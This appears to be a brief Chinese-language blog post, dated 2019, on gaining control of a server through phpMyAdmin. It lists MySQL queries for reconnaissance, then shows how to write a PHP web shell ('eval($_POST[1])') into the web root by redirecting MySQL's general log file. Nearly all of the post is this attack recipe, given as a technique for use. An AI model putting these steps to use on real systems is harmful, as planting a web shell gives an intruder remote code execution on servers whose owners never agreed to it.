iloveflag-blog

phpMyAdmin提权

字数统计: 37阅读时长: 1 min
2019/02/08 Share

信息收集:

1
2
3
select @@datadir;
SHOW VARIABLES LIKE “log%”
SHOW VARIABLES LIKE “general%”

写马:
1
2
3
set global general_log = “ON”;
SET global general_log_file=’网站根目录’;
select <?php eval($_POST[1])> ;

CATALOG